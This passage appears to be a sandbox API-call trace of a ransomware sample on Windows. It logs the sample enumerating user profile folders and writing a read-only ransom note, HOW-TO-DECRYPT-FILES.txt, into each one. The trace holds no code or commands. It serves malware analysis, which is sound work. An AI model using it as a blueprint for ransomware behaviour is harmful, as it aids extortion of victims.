ftLastWriteTime.dwLowDateTime=0xd3082b0, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.625] GetLastError () returned 0x12 [0059.625] SetErrorMode (uMode=0x0) returned 0x1 [0059.626] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.626] GetLastError () returned 0x12 [0059.626] SetErrorMode (uMode=0x1) returned 0x0 [0059.627] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\windows live\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.627] GetLastError () returned 0x0 [0059.627] GetFileType (hFile=0x184) returned 0x1 [0059.627] SetErrorMode (uMode=0x0) returned 0x1 [0059.627] GetFileType (hFile=0x184) returned 0x1 [0059.627] WriteFile (in: hFile=0x184, lpBuffer=0x1b67974*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1b67974*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0059.628] GetLastError () returned 0x0 [0059.628] CloseHandle (hObject=0x184) returned 1 [0059.628] GetLastError () returned 0x0 [0059.628] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.628] GetLastError () returned 0x0 [0059.628] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.628] GetLastError () returned 0x0 [0059.628] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Windows Live Gallery.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Windows Live Gallery.url", lpFilePart=0x0) returned 0x40 [0059.628] GetLastError () returned 0x0 [0059.628] SetErrorMode (uMode=0x1) returned 0x0 [0059.628] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\eebsym5\\favorites\\windows live\\windows live gallery.url"), fInfoLevelId=0x0, lpFileInformation=0x1b69628 | out: lpFileInformation=0x1b69628*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd3082b0, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.629] GetLastError () returned 0x0 [0059.629] SetErrorMode (uMode=0x0) returned 0x1 [0059.629] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.629] GetLastError () returned 0x0 [0059.629] SetErrorMode (uMode=0x1) returned 0x0 [0059.629] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\windows live\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.630] GetLastError () returned 0x5 [0059.631] SetErrorMode (uMode=0x0) returned 0x1 [0059.631] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Windows Live Mail.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Windows Live Mail.url", lpFilePart=0x0) returned 0x3d [0059.631] GetLastError () returned 0x5 [0059.631] SetErrorMode (uMode=0x1) returned 0x0 [0059.631] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\eebsym5\\favorites\\windows live\\windows live mail.url"), fInfoLevelId=0x0, lpFileInformation=0x1b87554 | out: lpFileInformation=0x1b87554*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.631] GetLastError () returned 0x5 [0059.631] SetErrorMode (uMode=0x0) returned 0x1 [0059.632] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.632] GetLastError () returned 0x5 [0059.632] SetErrorMode (uMode=0x1) returned 0x0 [0059.632] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\windows live\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.632] GetLastError () returned 0x5 [0059.633] SetErrorMode (uMode=0x0) returned 0x1 [0059.633] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Windows Live Spaces.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Windows Live Spaces.url", lpFilePart=0x0) returned 0x3f [0059.633] GetLastError () returned 0x5 [0059.633] SetErrorMode (uMode=0x1) returned 0x0 [0059.633] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\eebsym5\\favorites\\windows live\\windows live spaces.url"), fInfoLevelId=0x0, lpFileInformation=0x1ba5468 | out: lpFileInformation=0x1ba5468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.634] GetLastError () returned 0x5 [0059.634] SetErrorMode (uMode=0x0) returned 0x1 [0059.634] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.634] GetLastError () returned 0x5 [0059.634] SetErrorMode (uMode=0x1) returned 0x0 [0059.634] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\windows live\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.634] GetLastError () returned 0x5 [0059.635] SetErrorMode (uMode=0x0) returned 0x1 [0059.636] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links", lpFilePart=0x0) returned 0x16 [0059.636] GetLastError () returned 0x5 [0059.636] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.636] GetLastError () returned 0x5 [0059.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.636] GetLastError () returned 0x5 [0059.636] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links", lpFilePart=0x0) returned 0x16 [0059.636] GetLastError () returned 0x5 [0059.636] SetErrorMode (uMode=0x1) returned 0x0 [0059.636] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360e20 [0059.636] GetLastError () returned 0x5 [0059.636] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.636] GetLastError () returned 0x5 [0059.636] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.636] GetLastError () returned 0x5 [0059.636] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.636] GetLastError () returned 0x5 [0059.637] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.637] GetLastError () returned 0x5 [0059.637] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.637] GetLastError () returned 0x5 [0059.637] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.637] GetLastError () returned 0x12 [0059.637] FindClose (in: hFindFile=0x360e20 | out: hFindFile=0x360e20) returned 1 [0059.637] SetErrorMode (uMode=0x0) returned 0x1 [0059.637] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links", lpFilePart=0x0) returned 0x16 [0059.637] GetLastError () returned 0x12 [0059.637] SetErrorMode (uMode=0x1) returned 0x0 [0059.637] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360e20 [0059.637] GetLastError () returned 0x12 [0059.637] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.637] GetLastError () returned 0x12 [0059.637] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.637] GetLastError () returned 0x12 [0059.638] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.638] GetLastError () returned 0x12 [0059.638] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.638] GetLastError () returned 0x12 [0059.638] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.638] GetLastError () returned 0x12 [0059.638] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.638] GetLastError () returned 0x12 [0059.638] FindClose (in: hFindFile=0x360e20 | out: hFindFile=0x360e20) returned 1 [0059.638] SetErrorMode (uMode=0x0) returned 0x1 [0059.638] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links\\desktop.ini", lpFilePart=0x0) returned 0x22 [0059.638] GetLastError () returned 0x12 [0059.638] SetErrorMode (uMode=0x1) returned 0x0 [0059.638] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\desktop.ini" (normalized: "c:\\users\\eebsym5\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1bc485c | out: lpFileInformation=0x1bc485c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4a6ae0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x244)) returned 1 [0059.638] GetLastError () returned 0x12 [0059.638] SetErrorMode (uMode=0x0) returned 0x1 [0059.639] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.639] GetLastError () returned 0x12 [0059.639] SetErrorMode (uMode=0x1) returned 0x0 [0059.639] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.639] GetLastError () returned 0x0 [0059.639] GetFileType (hFile=0x184) returned 0x1 [0059.639] SetErrorMode (uMode=0x0) returned 0x1 [0059.639] GetFileType (hFile=0x184) returned 0x1 [0059.639] WriteFile (in: hFile=0x184, lpBuffer=0x1be0574*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1be0574*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0059.640] GetLastError () returned 0x0 [0059.640] CloseHandle (hObject=0x184) returned 1 [0059.641] GetLastError () returned 0x0 [0059.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.641] GetLastError () returned 0x0 [0059.641] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.641] GetLastError () returned 0x0 [0059.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x22 [0059.641] GetLastError () returned 0x0 [0059.641] SetErrorMode (uMode=0x1) returned 0x0 [0059.641] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\Desktop.lnk" (normalized: "c:\\users\\eebsym5\\links\\desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x1be21e0 | out: lpFileInformation=0x1be21e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4a6ae0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x1c1)) returned 1 [0059.641] GetLastError () returned 0x0 [0059.641] SetErrorMode (uMode=0x0) returned 0x1 [0059.642] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.642] GetLastError () returned 0x0 [0059.642] SetErrorMode (uMode=0x1) returned 0x0 [0059.642] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.642] GetLastError () returned 0x5 [0059.643] SetErrorMode (uMode=0x0) returned 0x1 [0059.643] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x24 [0059.643] GetLastError () returned 0x5 [0059.643] SetErrorMode (uMode=0x1) returned 0x0 [0059.643] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\Downloads.lnk" (normalized: "c:\\users\\eebsym5\\links\\downloads.lnk"), fInfoLevelId=0x0, lpFileInformation=0x1bffee4 | out: lpFileInformation=0x1bffee4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4a6ae0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x350)) returned 1 [0059.643] GetLastError () returned 0x5 [0059.643] SetErrorMode (uMode=0x0) returned 0x1 [0059.644] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.644] GetLastError () returned 0x5 [0059.644] SetErrorMode (uMode=0x1) returned 0x0 [0059.644] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.644] GetLastError () returned 0x5 [0059.645] SetErrorMode (uMode=0x0) returned 0x1 [0059.645] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\RecentPlaces.lnk", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links\\RecentPlaces.lnk", lpFilePart=0x0) returned 0x27 [0059.645] GetLastError () returned 0x5 [0059.645] SetErrorMode (uMode=0x1) returned 0x0 [0059.645] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\eebsym5\\links\\recentplaces.lnk"), fInfoLevelId=0x0, lpFileInformation=0x1c1d824 | out: lpFileInformation=0x1c1d824*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec480980, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x16b)) returned 1 [0059.645] GetLastError () returned 0x5 [0059.645] SetErrorMode (uMode=0x0) returned 0x1 [0059.645] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.645] GetLastError () returned 0x5 [0059.646] SetErrorMode (uMode=0x1) returned 0x0 [0059.646] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.646] GetLastError () returned 0x5 [0059.647] SetErrorMode (uMode=0x0) returned 0x1 [0059.647] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Local Settings", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Local Settings", lpFilePart=0x0) returned 0x1f [0059.647] GetLastError () returned 0x5 [0059.647] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.647] GetLastError () returned 0x5 [0059.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.647] GetLastError () returned 0x5 [0059.647] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Local Settings", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Local Settings", lpFilePart=0x0) returned 0x1f [0059.647] GetLastError () returned 0x5 [0059.647] SetErrorMode (uMode=0x1) returned 0x0 [0059.647] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Local Settings\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0059.647] GetLastError () returned 0x5 [0059.648] SetErrorMode (uMode=0x0) returned 0x1 [0059.648] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music", lpFilePart=0x0) returned 0x16 [0059.648] GetLastError () returned 0x5 [0059.648] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.648] GetLastError () returned 0x5 [0059.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.648] GetLastError () returned 0x5 [0059.648] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music", lpFilePart=0x0) returned 0x16 [0059.648] GetLastError () returned 0x5 [0059.649] SetErrorMode (uMode=0x1) returned 0x0 [0059.649] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360e20 [0059.649] GetLastError () returned 0x5 [0059.649] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.649] GetLastError () returned 0x5 [0059.649] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.649] GetLastError () returned 0x5 [0059.649] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.649] GetLastError () returned 0x5 [0059.649] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.649] GetLastError () returned 0x5 [0059.649] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.649] GetLastError () returned 0x5 [0059.649] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.649] GetLastError () returned 0x5 [0059.649] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.649] GetLastError () returned 0x5 [0059.649] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.649] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.650] GetLastError () returned 0x5 [0059.650] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x5 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x5 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] GetLastError () returned 0x5 [0059.651] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.651] 